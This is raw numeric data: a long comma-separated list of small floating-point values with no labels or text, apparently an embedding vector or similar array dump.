-0.0014747977256774902, -0.002979672746732831, 0.0007253678631968796, 0.011910670436918736, 0.022650325670838356, -0.017132116481661797, -0.02621149644255638, 0.018543751910328865, 0.01862395741045475, -0.022698450833559036, -0.0033907312899827957, 0.01490237470716238, 0.026516281068325043, -0.017934180796146393, -0.004980825819075108, 0.01597714237868786, -0.023179689422249794, 0.016209740191698074, 0.02409404329955578, -0.012255558744072914, 0.01529538631439209, -0.003657418070361018, -0.009448329918086529, -0.005534251220524311, 0.009271875955164433, 0.01498258113861084, 0.015263304114341736, 0.004170740023255348, 0.009191669523715973, 0.0000330851980834268, -0.002011178992688656, -0.0003416297258809209, -0.010699551552534103, 0.007792064920067787, -0.007575507275760174, 0.007022082339972258, 0.005053011700510979, 0.008509913459420204, 0.01581672951579094, -0.008365541696548462, -0.016458380967378616, 0.033269669860601425, -0.014974560588598251, 0.0004391307884361595, 0.028890393674373627, -0.0001820939069148153, -0.003817831166088581, 0.005161290522664785, -0.012030980549752712, -0.00017708099039737135, -0.046070635318756104, 0.01669900119304657, -0.028216660022735596, 0.0036874955985695124, 0.004134647082537413, 0.02393363043665886, -0.0024843974970281124, 0.0008552022045478225, -0.027382511645555496, 0.0037075472064316273, 0.002584655536338687, -0.01410030946135521, -0.002887435257434845, -0.017517108470201492, 0.0054700858891010284, 0.004980825819075108, 0.0023941651452332735, 0.0339113250374794, 0.004238915629684925, -0.024591324850916862, -0.0011419405927881598, 0.0065127708949148655, -0.013394491747021675, 0.0002649322268553078, -0.039204955101013184, 0.0003313532506581396, 0.00034213101025670767, 0.026227537542581558, -0.004539689980447292, -0.02045266702771187, 0.013947917148470879, 0.015568088740110397, -0.019313734024763107, 0.022971151396632195, 0.021719930693507195, -0.006456626113504171, 0.015536006540060043, 0.0102503951638937, 0.024671530351042747, 0.01032258104532957, -0.00217760750092566, 0.0011008346918970346, 0.014389052987098694, -0.017870016396045685, 0.011838484555482864, 0.0012983432970941067, 0.018479585647583008, -0.026179414242506027, -0.007551445625722408, -0.0021655764430761337, -0.003837882773950696, 0.007599569391459227, 0.004872546996921301, 0.005113166756927967, 0.02175201289355755, -0.02003559283912182, 0.02017996460199356, 0.011244956403970718, -0.007138381712138653, -0.043728604912757874, 0.010691531002521515, -0.021206608042120934, 0.0036834850907325745, 0.024944232776761055, -0.0031801892910152674, -0.03859538584947586, 0.03221094608306885, -0.0019199439557269216, 0.012215455994009972, -0.012600447051227093, 0.012833045795559883, -0.028633734211325645, -0.014653733931481838, -0.01292929332703352, -0.0022277366369962692, 0.009504474699497223, -0.037536658346652985, 0.008405645377933979, -0.023949671536684036, 0.0005398902576416731, -0.013779482804238796, 0.008181067183613777, 0.0062601203098893166, 0.01790209859609604, -0.008124922402203083, 0.00012795449583791196, 0.0033185454085469246, 0.00785623025149107, 0.0039922804571688175, 0.010595283471047878, 0.011790361255407333, 0.005742787849158049, 0.012335765175521374, -0.007142391987144947, -0.001804647035896778, -0.009769156575202942, -0.020982030779123306, 0.01732461154460907, 0.021110359579324722, -0.013715317472815514, 0.006095696706324816, 0.005161290522664785, 0.00217760750092566, 0.00047547437134198844, -0.023709053173661232, -0.026291701942682266, -0.013963958248496056, -0.006649122107774019, 0.011285060085356236, 0.022971151396632195, 0.010683510452508926, 0.0006837607361376286, 0.022088879719376564, 0.003148106625303626, -0.003523072227835655, 0.023035317659378052, -0.001003584242425859, -0.018800411373376846, 0.0006501742172986269, 0.007294784300029278, -0.017661480233073235, -0.0063844402320683, 0.00020126828167121857, 0.0002328496047994122, -0.010835902765393257, -0.007030102889984846, 0.028024163097143173, 0.0013123794924467802, -0.03673459216952324, 0.03298092633485794, -0.03267614170908928, 0.004668020643293858, -0.002127478364855051, -0.015688398852944374, -0.03442464396357536, -0.009135524742305279, 0.027382511645555496, 0.011758278124034405, -0.0049206712283194065, 0.004086522851139307, 0.007158433552831411, -0.006769431754946709, -0.008349500596523285, -0.03339800238609314, 0.03254781290888786, 0.013073665089905262, 0.041643232107162476, 0.009031255729496479, -0.019586436450481415, -0.01955435425043106, -0.018511667847633362, -0.010450911708176136, 0.008365541696548462, -0.00152793456800282, 0.0054861269891262054, 0.01721232198178768, -0.024639448150992393, 0.028377072885632515, 0.0026488208677619696, -0.0025545782409608364, 0.02709376811981201, -0.0006030529038980603, 0.020420584827661514, -0.0031862047035247087, -0.01544777862727642, 0.01753314957022667, -0.01172619592398405, 0.019811013713479042, 0.0320344902575016, 0.03801789879798889, 0.008032684214413166, -0.005714715924113989, -0.03615710511803627, 0.0049206712283194065, -0.010218312963843346, -0.009424268268048763, -0.015953080728650093, -0.0016933605074882507, -0.011269018054008484, 0.007952477782964706, -0.0037296039517968893, -0.04250946268439293, -0.018527710810303688, -0.0062160068191587925, -0.007547434885054827, -0.02122264914214611, 0.022955110296607018, -0.005847056396305561, 0.0020382485818117857, 0.00415068818256259, 0.0160172451287508, -0.00354312383569777, 0.009648846462368965, -0.006356367841362953, -0.011477555148303509, -0.01138932816684246, -0.011854526586830616, -0.0006952903931960464, 0.0121432701125741, -0.004391307942569256, 0.0004932702286168933, 0.015455800108611584, 0.011718175373971462, -0.01950622908771038, 0.017035868018865585, -0.0010667468886822462, 0.03121638484299183, -0.00936812348663807, 0.0006887736381031573, -0.014276763424277306, -0.014204577542841434, -0.0064165228977799416, -0.03043035976588726, -0.010346643626689911, -0.006600997876375914, -0.0034288293682038784, -0.0032984938006848097, -0.007094268221408129, -0.004804371390491724, -0.016209740191698074, -0.007507331669330597, 0.032435525208711624, 0.008357521146535873, 0.026933355256915092, 0.0031380807049572468, 0.011742237024009228, -0.009408227168023586, 0.01211920753121376, 0.0074030631221830845, 0.012865128926932812, 0.007944457232952118, 0.027125850319862366, 0.010491015389561653, 0.012576385401189327, 0.01665087789297104, -0.007479259744286537, -0.007575507275760174, -0.011180791072547436, 0.0020342383068054914, -0.0038037949707359076, 0.010755696333944798, 0.0020101764239370823, -0.006292202975600958, 0.010643407702445984, 0.01644233986735344, -0.017517108470201492, 0.005201393738389015, -0.013386471197009087, 0.015896935015916824, 0.024013837799429893, -0.0013825602363795042, -0.0016713037621229887, -0.005333734676241875, -0.002408201340585947, -0.0015580119797959924, 0.019426023587584496, 0.020308295264840126, -0.0013133820611983538, -0.018688123673200607, -0.007631652057170868, 0.022955110296607018, -0.007010051514953375, -0.01857583411037922, 0.006633080542087555, 0.0017775773303583264, 0.013234078884124756, 0.010795800015330315, 0.0006336316582746804, -0.006657142657786608, -0.03403965383768082, 0.0026909292209893465, -0.013643131591379642, 0.004072486888617277, -0.006677194032818079, 0.015993183478713036, -0.017196280881762505, 0.013226058334112167, -0.017613355070352554, 0.004234905354678631, 0.014790085144340992, -0.012407951056957245, -0.0008531970088370144, -0.01544777862727642, -0.023484474048018456, 0.008020653389394283, 0.005157280247658491, -0.016474422067403793, -0.021559517830610275, -0.02173597179353237, -0.002847332041710615, 0.015151014551520348, 0.007226609159260988, -0.006256110034883022, -0.016474422067403793, -0.017517108470201492, 0.009576660580933094, -0.002963631646707654, 0.009071359410881996, 0.030927641317248344, -0.0025806452613323927, 0.007820137776434422, -0.002983683254569769, 0.0006461638840846717, -0.0029014714527875185, 0.0006090683746151626, -0.0069498964585363865, 0.0005243502091616392, 0.0043431841768324375, -0.0010807830840349197, -0.004275008570402861, -0.011453493498265743, 0.008028673939406872, 0.0037717123050242662, 0.006348347291350365, 0.029419757425785065, 0.011357245966792107, 0.02085370011627674, -0.019811013713479042, 0.008445748127996922, -0.0016131539596244693, 0.0017434896435588598, -0.017613355070352554, 0.015223200432956219, -0.020260171964764595, -0.025345265865325928, -0.0020252149552106857, 0.011838484555482864, 0.021623682230710983, 0.0059954384341835976, -0.012704715132713318, -0.018559793010354042, -0.01230368297547102, -0.0056385197676718235, 0.016105473041534424, 0.004214853513985872, 0.020420584827661514, 0.007651703432202339, 0.012977417558431625, -0.008758554235100746, -0.0036193199921399355, -0.02184826135635376, 0.004571772646158934, 0.03756874054670334, -0.023420309647917747, -0.014453218318521976, -0.01596912182867527, 0.0049206712283194065, -0.009295937605202198, -0.0024182270281016827, -0.004559741821140051, -0.015054767020046711, -0.009319999255239964, 0.0198751799762249, 0.005770860239863396, -0.022698450833559036, -0.02029225416481495, 0.011228915303945541, 0.017709603533148766, 0.0016783217433840036, 0.007751961704343557, 0.0019239543471485376, 0.0160172451287508, -0.001110860495828092, -0.018142718821763992, 0.004114595241844654, -0.009255833923816681, 0.0027911874931305647, -0.016554629430174828, 0.0037636917550116777, -0.0030418329406529665, -0.013739380054175854, 0.013001479208469391, 0.004579793196171522, 0.016875455155968666, -0.017709603533148766, -0.0007845201762393117, 0.0007995589403435588, -0.007050154730677605, 0.009344061836600304, -0.0047963508404791355, -0.012841066345572472, 0.0006612026481889188, -0.01658671163022518, -0.017613355070352554, 0.0343283973634243, 0.005309672560542822, 0.02710980921983719, 0.01048299390822649, 0.013819586485624313, 0.01027445774525404, 0.0018958820728585124, -0.015608192421495914, -0.0013334336690604687, -0.014854250475764275, 0.0015138983726501465, 0.0033245610538870096, 0.026853147894144058, 0.00536982761695981, 0.006488708779215813, 0.0045958347618579865, 0.004327142611145973, 0.02003559283912182, -0.002356067067012191, 0.016827331855893135, 0.0037015315610915422, 0.013017521239817142, -0.0020613078959286213, -0.0023440360091626644, -0.0003148106625303626, -0.012833045795559883, -0.010282478295266628, 0.007659724447876215, -0.012496178038418293, -0.006171892862766981, -0.003330576466396451, 0.0032984938006848097, -0.007182495202869177, 0.011124646291136742, 0.02340426668524742, -0.023003235459327698, -0.01042685005813837, 0.006921824067831039, 0.0036654386203736067, 0.0024162218905985355, 0.000008412287570536137, -0.0057668499648571014, 0.01950622908771038, -0.007519362960010767, -0.024462994188070297, 0.0046399482525885105, -0.015776624903082848, -0.05810161679983139, -0.0026728827506303787, 0.001306363963522017, 0.0007163446280173957, 0.007142391987144947, 0.0012672633165493608, 0.00745118735358119, -0.026339827105402946, -0.0005025441059842706, -0.0023941651452332735, 0.023388225585222244, -0.00208135973662138, 0.006288192700594664, -0.006264130584895611, 0.005847056396305561, 0.016570670530200005, -0.015640275552868843, 0.02107827737927437, 0.0040183477103710175, 0.0035752062685787678, -0.012776901014149189, -0.019602477550506592, 0.003126049879938364, 0.012512220069766045, 0.02091786451637745, 0.0016472417628392577, 0.025152770802378654, 0.000832142832223326, -0.03294884413480759, -0.001872822642326355, -0.014950498007237911, -0.009544577449560165, 0.0015640275087207556, -0.0030157656874507666, 0.01888061873614788, 0.023291978985071182, 0.0023680978920310736, 0.006332306191325188, -0.009432288818061352, -0.00002941950697277207, 0.010194250382483006, 0.02107827737927437, -0.03676667809486389, -0.019265610724687576, 0.006003459449857473, 0.0167471244931221, 0.00798857118934393, 0.005887159612029791, 0.00928791705518961, -0.00793643668293953, 0.009488433599472046, -0.005550292320549488, 0.014766023494303226, 0.0043311528861522675, 0.003970223478972912, 0.003370679682120681, 0.007322856690734625, -0.0033265661913901567, 0.0019219490932300687, -0.009889465756714344, -0.008758554235100746, 0.015263304114341736, -0.0020693286787718534, 0.012800963595509529, 0.013129809871315956, -0.008421686477959156, -0.004339173436164856, 0.016362134367227554, -0.00545003404840827, 0.015287365764379501, -0.006588967051357031, -0.003188209841027856, 0.009560619480907917, 0.01211920753121376, 0.0013163897674530745, -0.025970876216888428, 0.0008993158116936684, 0.026612529531121254, 0.00480036111548543, 0.009961651638150215, -0.006504750344902277, 0.01172619592398405, -0.0247036125510931, -0.011140688322484493, 0.016923578456044197, 0.005249517969787121, -0.013025541789829731, -0.001817680662497878, -0.0019740834832191467, 0.017132116481661797, -0.016682960093021393, -0.008333459496498108, -0.002077349228784442, 0.016554629430174828, -0.02771937847137451, -0.015054767020046711, 0.005646540317684412, -0.008662305772304535, -0.008080808445811272, -0.011910670436918736, 0.011613906361162663, -0.005305662285536528, -0.0024182270281016827, 0.006207985803484917, -0.014397073537111282, 0.010867985896766186, -0.012231497094035149, -0.00274506863206625, -0.006560894660651684, -0.004792340565472841, 0.012367848306894302, 0.001725443173199892, -0.015912976115942, 0.01934581622481346, -0.0004651979252230376, -0.00011322907084831968, 0.01873624697327614, -0.017918139696121216, -0.0046118758618831635, -0.0013996040215715766, 0.00670927669852972, -0.020821616053581238, -0.00573476729914546, 0.027270222082734108, 0.0036393716000020504, -0.0005965360905975103, -0.013137830421328545, 0.03776123747229576, -0.03026994690299034, 0.000779507274273783, 0.01410030946135521, 0.02085370011627674, -0.026965437456965446, -0.0007920395582914352, -0.006717297248542309, -0.0020392511505633593, 0.007763992995023727, -0.010579242371022701, -0.00574679858982563, -0.008253253065049648, 0.006380429957062006, -0.01653858833014965, -0.021158484742045403, 0.004672030918300152, 0.014437176287174225, -0.012744818814098835, -0.02616337314248085, 0.02642003260552883, -0.005389879457652569, -0.009247813373804092, -0.006167882587760687, 0.006412512622773647, -0.013177934102714062, 0.004226884339004755, -0.0010136101627722383, 0.01737273670732975, -0.018222924321889877, 0.02101411297917366, 0.026965437456965446, -0.006661152932792902, 0.0167471244931221, -0.006576936226338148, -0.013715317472815514, 0.0016913553699851036, 0.01564829610288143, 0.023965712636709213, 0.01448530051857233, 0.021318897604942322, -0.02293906919658184, -0.0029255333356559277, -0.008124922402203083, 0.012030980549752712, -0.012111186981201172, -0.007647693157196045, -0.027959998697042465, -0.006103717256337404, 0.006115748547017574, 0.02606712467968464, 0.00743915606290102, 0.0024763767141848803, -0.0056385197676718235, 0.0020121815614402294, -0.007122340612113476, -0.0339113250374794, -0.002241772599518299, 0.018287090584635735, 0.000020756573576363735, 0.011581824161112309, 0.006167882587760687, 0.001391583471558988, -0.01310574822127819, 0.0004985337727703154, 0.006296213250607252, -0.002773141022771597, -0.010474973358213902, -0.014397073537111282, 0.006625059992074966, -0.002751084277406335, 0.027639172971248627, 0.008846781216561794, 0.013161893002688885, -0.010948192328214645, -0.0035711959935724735, -0.008108881302177906, 0.009496454149484634, -0.001813670271076262, -0.02771937847137451, 0.0007098278729245067, 0.02829686552286148, 0.02200867421925068, -0.0015068802749738097, 0.008798656985163689, -0.020420584827661514, -0.022826779633760452, 0.032483648508787155, -0.00030227837851271033, -0.009352082386612892, 0.0012261574156582355, -0.01326616108417511, 0.03277239203453064, 0.012359827756881714, 0.007515352685004473, -0.003280447330325842, 0.0020873751491308212, -0.005028950050473213, 0.0035010152496397495, 0.0046559893526136875, 0.005321703851222992, 0.023757176473736763, -0.0030418329406529665, 0.0000655437761452049, 0.007523373235017061, 0.01131714228540659, 0.0007910369895398617, -0.012127228081226349, 0.0029977192170917988, 0.02038850076496601, 0.010130085982382298, 0.02512068673968315, -0.017709603533148766, -0.00830137636512518, 0.0035992683842778206, -0.018222924321889877, -0.01334636751562357, 0.0029536057263612747, 0.008622203022241592, -0.0213349387049675, -0.003936135675758123, -0.016009224578738213, -0.015600171871483326, 0.00046143823419697583, 0.000873749959282577, 0.009239792823791504, 0.008718450553715229, -0.01253628171980381, 0.019377898424863815, -0.01936185732483864, -0.02268240787088871, 0.00309597235172987, 0.00028523450600914657, 0.00448755593970418, -0.021318897604942322, -0.004792340565472841, 0.010715593583881855, -0.029564129188656807, 0.0061197588220238686, -0.009865404106676579, 0.015014663338661194, -0.009255833923816681, -0.002865378512069583, -0.008846781216561794, -0.0221690870821476, -0.002317968988791108, 0.003839887911453843, -0.002400180557742715, 0.011597865261137486, -0.009560619480907917, 0.016634834930300713, -0.01653858833014965, 0.014212598092854023, 0.008670326322317123, -0.00678948312997818, 0.005578364711254835, 0.011902649886906147, -0.004535679705440998, -0.024318622425198555, 0.01596110127866268, -0.025617968291044235, -0.02080557495355606, 0.005742787849158049, -0.029355593025684357, -0.016249844804406166, -0.019073113799095154, 0.017549190670251846, 0.0008657292928546667, 0.008080808445811272, -0.004074492026120424, 0.007623631507158279, -0.0032764370553195477, 0.02122264914214611, -0.015335489995777607, 0.02008371613919735, 0.018062511458992958, 0.010747675783932209, -0.015776624903082848, -0.02117452584207058, -0.020885782316327095, -0.002063313266262412, 0.007567486725747585, 0.005594405811280012, 0.01204702164977789, -0.021254731342196465, 0.0023440360091626644, -0.015086849220097065, -0.005510189104825258, 0.01131714228540659, 0.019843097776174545, -0.013193975202739239, -0.001175025710836053, 0.012472116388380527, 0.0026969448663294315, -0.0038418930489569902, -0.002410206478089094, -0.002895456040278077, 0.007948467507958412, -0.004583803471177816, -0.003398752072826028, 0.007788054645061493, -0.034777555614709854, -0.018126677721738815, -0.019843097776174545, -0.005117177031934261, 0.01092413067817688, 0.020196005702018738, -0.005225455854088068, 0.0026949397288262844, -0.009039276279509068, 0.02205679751932621, 0.010186229832470417, -0.012881170026957989, 0.006496729329228401, -0.003625335404649377, 0.027398552745580673, 0.0005539263947866857, -0.01466977596282959, 0.010603304021060467, 0.005570344161242247, -0.011445472948253155, 0.009552598930895329, 0.0004235907690599561, -0.006199965253472328, -0.000023106375010684133, -0.009119483642280102, -0.014116350561380386, 0.02127077430486679, 0.0066691734828054905, 0.017083993181586266, -0.013651152141392231, -0.012656591832637787, -0.01547184120863676, -0.014517382718622684, 0.0033345867414027452, 0.01375542115420103, 0.015070808120071888, 0.0030117554124444723, -0.018656039610505104, -0.00928791705518961, -0.020564956590533257, -0.003306514583528042, 0.012560343369841576, 0.00910344161093235, -0.026772942394018173, 0.01586485281586647, -0.03121638484299183, 0.014533424749970436, 0.002660851925611496, -0.007727900054305792, -0.0038699654396623373, 0.004856505896896124, 0.0081128915771842, 0.009953631088137627, -0.004607865586876869, 0.0024362734984606504, 0.010675489902496338, 0.002079354366287589, 0.012440034188330173, -0.015696419402956963, 0.03833872452378273, 0.0068255760706961155, 0.0069940099492669106, 0.004888588562607765, 0.017549190670251846, -0.027943957597017288, 0.00860616099089384, -0.002291901735588908, 0.010001755319535732, 0.014998622238636017, -0.016137555241584778, -0.01399604044854641, 0.016241824254393578, 0.0074311355128884315, -0.0007910369895398617, 0.0037997846957296133, 0.015848811715841293, 0.005650550592690706, -0.00009342808334622532, -0.013875731267035007, 0.0071062990464270115, 0.004579793196171522, -0.003330576466396451, 0.007254681084305048, -0.0019821040332317352, 0.000959470693487674, 0.007743941154330969, -0.0021715920884162188, 0.02455924078822136, -0.004543700255453587, 0.011124646291136742, -0.015640275552868843, -0.026965437456965446, -0.009809259325265884, -0.00016354613762814552, 0.014204577542841434, 0.00611173827201128, -0.006777452304959297, -0.0010356669081375003, -0.021880343556404114, 0.008365541696548462, -0.004523648880422115, -0.005879139062017202, 0.012022959999740124, -0.006360378582030535, 0.006865679752081633, 0.009576660580933094, -0.029403716325759888, 0.003057874273508787, -0.013434594497084618, 0.006657142657786608, 0.006629070267081261, -0.0014356969622895122, -0.019121238961815834, -0.016618793830275536, 0.007326866965740919, -0.013298244215548038, 0.0011569792404770851, 0.0033887261524796486, -0.002979672746732831, -0.013242099434137344, -0.0048925988376140594, 0.0003564177895896137, -0.004186781123280525, 0.00609970698133111, -0.01407624687999487, 0.008926987648010254, 0.013595008291304111, -0.03785748407244682, -0.00030227837851271033, 0.02237762324512005, 0.006937865633517504, -0.0031380807049572468, -0.0025325214955955744, -0.022971151396632195, -0.0012853097869083285, 0.01139734871685505, 0.004884578287601471, -0.001356493099592626, 0.007848209701478481, 0.009336041286587715, 0.015616212971508503, 0.00025164801627397537, 0.016193699091672897, 0.016779206693172455, 0.004912650212645531, -0.00804070569574833, -0.00001141219945566263, 0.018062511458992958, 0.014453218318521976, 0.0031240445096045732, 0.01899290829896927, -0.004210843238979578, 0.005622478201985359, 0.018479585647583008, -0.0080607570707798, -0.022040756419301033, 0.006717297248542309, 0.005433992948383093, 0.001954031642526388, 0.015223200432956219, -0.014557486400008202, 0.0007053162553347647, -0.025409430265426636, -0.005518209654837847, 0.026660652831196785, 0.0012632529251277447, -0.011918690986931324, -0.011670051142573357, 0.029018724337220192, -0.012496178038418293, 0.020998071879148483, 0.0013795524137094617, -0.01795022375881672, -0.010787779465317726, -0.0073709809221327305, 0.0023660927545279264, 0.0003288467996753752, 0.011068502441048622, 0.000913351948838681, -0.0029495954513549805, 0.001618166919797659, 0.0049367123283445835, 0.016362134367227554, -0.010466952808201313, -0.015728501603007317, 0.007210567593574524, -0.021784095093607903, -0.012391909956932068, -0.0007775021367706358, -0.008209139108657837, 0.005253528244793415, -0.00904729776084423, 0.0062160068191587925, 0.015279345214366913, -0.0029736573342233896, 0.01571246050298214, -0.009993734769523144, -0.021110359579324722, -0.004740206524729729, 0.010531118139624596, -0.0020893802866339684, 0.01669900119304657, -0.0005047998856753111, -0.03301301226019859, 0.012744818814098835, -0.0043431841768324375, 0.018190842121839523, -0.010675489902496338, 0.0056545608676970005, 0.013819586485624313, 0.014397073537111282, 0.015455800108611584, -0.024382786825299263, 0.0006130787078291178, 0.011854526586830616, 0.023003235459327698, -0.004976815544068813, 0.014830188825726509, -0.002307943068444729, 0.011870567686855793, -0.0120390010997653, -0.0005328721599653363, 0.025874629616737366, 0.003302504075691104, -0.011710154823958874, 0.02200867421925068, 0.014429155737161636, 0.011854526586830616, 0.0034288293682038784, -0.003561170306056738, -0.01737273670732975, -0.010410808026790619, 0.00609970698133111, 0.02127077430486679, 0.006015490274876356, 0.0027149913366883993, -0.004631927702575922, -0.015351531095802784, -0.0010527108097448945, 0.011269018054008484, -0.011477555148303509, 0.009512495249509811, 0.016033286228775978, 0.01173421647399664, 0.011036419309675694, 0.0070902579464018345, 0.0009890468791127205, 0.000444644974777475, 0.01862395741045475, -0.008838760666549206, -0.0076837860979139805, 0.015800688415765762, -0.0036834850907325745, 0.018078552559018135, -0.0022738552652299404, -0.002612727927044034, 0.013538863509893417, -0.023420309647917747, 0.020773492753505707, -0.000011733339306374546, -0.009544577449560165, 0.011108605191111565, -0.0020141866989433765, 0.007062185555696487, -0.00018021406140178442, -0.006039552390575409, 0.004198812413960695, 0.013402512297034264, 0.028441237285733223, 0.013899792917072773, 0.01748502440750599, -0.012175352312624454, 0.003697521286085248, -0.006095696706324816, -0.009464371018111706, 0.009536556899547577, -0.0019169362494722009, 0.0006802516872994602, -0.013226058334112167, 0.011822443455457687, -0.014910395257174969, 0.013322305865585804, 0.011188811622560024, -0.0040785023011267185, -0.0011168760247528553, 0.0073709809221327305, 0.02196054905653, -0.0000902323517948389, 0.007298795040696859, 0.010892047546803951, -0.0007850214606150985, 0.009336041286587715, -0.01669900119304657, -0.030622856691479683, -0.0010787779465317726, 0.0294999647885561, 0.006055593490600586, 0.015592150390148163, -0.015929019078612328, -0.020949946716427803, -0.012680653482675552, -0.007342908531427383, 0.023949671536684036, -0.003400757210329175, -0.024158209562301636, 0.0011319147888571024, 0.0009223751840181649, -0.008437727577984333, 0.010154147632420063, 0.016522547230124474, -0.004122615791857243, 0.0014677796280011535, 0.01690753735601902, -0.00968092866241932, 0.02319573052227497, -0.0018257013289257884, 0.010916110128164291, 0.02449507638812065, 0.0022538036573678255, -0.008702409453690052, 0.009656867012381554, -0.02382134087383747, -0.019602477550506592, -0.012239517644047737, 0.03105597198009491, 0.008004612289369106, 0.02771937847137451, -0.017805851995944977, -0.031088054180145264, -0.017886057496070862, -0.01920144446194172, 0.013659173622727394, 0.002891445765271783, -0.005622478201985359, 0.0010807830840349197, 0.013129809871315956, 0.001967065269127488, 0.002815249375998974, 0.022088879719376564, 0.0058109634555876255, -0.010723614133894444, 0.02091786451637745, 0.006657142657786608, 0.019586436450481415, 0.021094318479299545, -0.01665087789297104, 0.0418357290327549, 0.012632529251277447, -0.02595483511686325, 0.007743941154330969, 0.006981979124248028, -0.0020171944051980972, 0.003440860426053405, -0.012335765175521374, 0.02257012017071247, -0.0016061358619481325, -0.011662030592560768, -0.010932151228189468, -0.012480136938393116, -0.020003510639071465, -0.003717572893947363, 0.01376344170421362, -0.010001755319535732, -0.0014066221192479134, 0.009881445206701756, 0.005317693576216698, 0.007984560914337635, 0.005642530042678118, -0.02184826135635376, 0.00029450838337652385, -0.006552874110639095, 0.010378725826740265, -0.00044013335718773305, 0.0012041006702929735, 0.009071359410881996, 0.006348347291350365, 0.0054700858891010284, -0.012544302269816399, 0.005213425029069185, -0.034617140889167786, 0.009953631088137627, 0.012247538194060326, -0.0003714565245900303, 0.018495626747608185, -0.005265559069812298, 0.007727900054305792, 0.017148157581686974, -0.006889741402119398, -0.005105146206915379, 0.0016853398410603404, -0.042669877409935, 0.008878863416612148, 0.009015214629471302, -0.011662030592560768, -0.008405645377933979, -0.009151565842330456, -0.007362959906458855, -0.006889741402119398, -0.008469810709357262, -0.0033626591321080923, -0.00968092866241932, 0.01764543727040291, 0.015945060178637505, -0.0011379302013665438, 0.0038438981864601374, -0.021495351567864418, 0.004575782921165228, 0.0031059980392456055, -0.008349500596523285, 0.0009258842328563333, 0.00574679858982563, -0.0020492770709097385, 0.011509638279676437, -0.024847984313964844, 0.01352282240986824, 0.024318622425198555, 0.0021114370319992304, 0.003122039372101426, -0.01748502440750599, 0.008096849545836449, 0.0019109207205474377, -0.008413665927946568, 0.0004426398372743279, 0.007900344207882881, 0.0032964886631816626, -0.03200240805745125, -0.0110845435410738, 0.014373010955750942, 0.01235180627554655, -0.024045919999480247, -0.0013955937465652823, -0.03330175578594208, -0.013017521239817142, 0.010298519395291805, 0.0061197588220238686, 0.020051633939146996, -0.0005055518122389913, -0.0014106325106695294, 0.02903476543724537, -0.017886057496070862, 0.010098002851009369, 0.0059793973341584206, -0.007780034095048904, -0.00517733208835125, -0.006448605563491583, 0.010996316559612751, -0.017725644633173943, 0.009376144036650658, 0.011958794668316841, 0.007960498332977295, -0.0055141993798315525, -0.004776299465447664, -0.00853397510945797, -0.0029816781170666218, -0.004118605516850948, 0.007010051514953375, -0.013177934102714062, 0.01934581622481346, -0.008926987648010254, 0.004820412956178188, 0.00435521500185132, 0.02064516209065914, 0.005534251220524311, -0.015022683888673782, -0.005778880789875984, 0.0023901548702269793, -0.009384164586663246, 0.005634509027004242, -0.009079379960894585, -0.022858863696455956, 0.00027896836400032043, -0.017501065507531166, -0.00847783125936985, -0.012897211126983166, 0.03043035976588726, -0.02017996460199356, -0.0030678999610245228, -0.004503597039729357, 0.009568640030920506, 0.02882622927427292, 0.008750532753765583, -0.008413665927946568, -0.01748502440750599, -0.02107827737927437, -0.002057297620922327, 0.018800411373376846, -0.020709328353405, -0.018351254984736443, -0.008943028748035431, -0.02439882792532444, -0.009303958155214787, -0.0121432701125741, 0.015592150390148163, -0.003926109988242388, -0.005642530042678118, 0.011878588236868382, -0.02236158214509487, -0.002706970553845167, 0.01992330327630043, 0.02933955192565918, -0.005417951382696629, 0.0175812728703022, 0.024735696613788605, -0.010763716883957386, 0.01649046316742897, 0.015584129840135574, 0.007038123439997435, -0.005349775776267052, 0.004383287392556667, -0.014597590081393719, 0.01066746935248375, -0.001745494781062007, -0.00019575408077798784, 0.001249216846190393, 0.005105146206915379, 0.017805851995944977, -0.008734491653740406, 0.002169586718082428, 0.004319122061133385, 0.008197108283638954, -0.002077349228784442, -0.01344261597841978, 0.0009113467531278729, 0.005117177031934261, 0.008429707027971745, 0.0039220997132360935, 0.014629672281444073, 0.0011800386710092425, 0.007840189151465893, -0.001918941386975348, -0.001813670271076262, 0.001712409546598792, -0.019008949398994446, 0.00860616099089384, 0.001210116082802415, 0.031440962105989456, -0.011413389816880226, 0.029419757425785065, 0.01409228891134262, -0.006035542115569115, -0.00047848213580437005, 0.02662857063114643, 0.008485851809382439, -0.0075434246100485325, -0.030302029103040695, -0.021030154079198837, 0.015848811715841293, -0.005606437101960182, 0.01269669458270073, 0.0028132442384958267, 0.007110309321433306, -0.030670979991555214, -0.029772667214274406, -0.016426298767328262, 0.0038298622239381075, 0.01685941405594349, 0.007892323657870293, 0.00853397510945797, 0.011309121735394001, 0.006236058194190264, 0.01376344170421362, -0.012167331762611866, 0.00936010293662548, 0.0196666419506073, -0.0032864627428352833, 0.0015078828437253833, -0.020869741216301918, 0.007792064920067787, 0.0051733218133449554, 0.000014083139831200242, 0.004872546996921301, 0.0029114973731338978, 0.018704164773225784, -0.00039175880374386907, 0.0002080357080558315, -0.014028123579919338, -0.0024563251063227654, 0.014589568600058556, -0.011621926911175251, 0.006131789647042751, 0.0020432614255696535, 0.001898889779113233, -0.010956212878227234, 0.002329999813809991, -0.012857107445597649, 0.00374564528465271, -0.008806677535176277, 0.016666918992996216, 0.0038559292443096638, 0.029163096100091934, 0.020821616053581238, 0.003879991127178073, -0.004651979077607393, -0.008261273615062237, 0.011766298674046993, 0.0330771766602993, 0.029371634125709534, 0.006861669011414051, -0.01660275273025036, -0.007607589941471815, 0.01066746935248375, 0.015006642788648605, 0.020516831427812576, -0.007202547043561935, -0.0013043588260188699, -0.005117177031934261, 0.01529538631439209, -0.02059703879058361, -0.004732185509055853, 0.002035240875557065, -0.014364990405738354, -0.005105146206915379, -0.003952177241444588, 0.008750532753765583, 0.023709053173661232, -0.009408227168023586, -0.008517934009432793, -0.01414843276143074, 0.024960273876786232, 0.005109156481921673, -0.008846781216561794, 0.005261548794806004, 0.019057072699069977, -0.015784647315740585, 0.0020522847771644592, 0.0012923277681693435, 0.016731083393096924, -0.009496454149484634, -0.012231497094035149, -0.00845376867800951, 0.017853975296020508, -0.007663734722882509, 0.008341480046510696, -0.001898889779113233, -0.011220894753932953, -0.008237211033701897, 0.01417249534279108, 0.014437176287174225, 0.0029716521967202425, -0.006296213250607252, -0.01204702164977789, -0.006175903137773275, -0.007864250801503658, -0.010065920650959015, 0.0008115898817777634, -0.003970223478972912, -0.011244956403970718, -0.010314560495316982, 0.00912750419229269, -0.008702409453690052, -0.02273053303360939, -0.005069053266197443, -0.011100584641098976, 0.004555731080472469, -0.03458505868911743, -0.01219941396266222, -0.006953906733542681, 0.0003982755879405886, -0.014934456907212734, 0.011028398759663105, -0.008718450553715229, 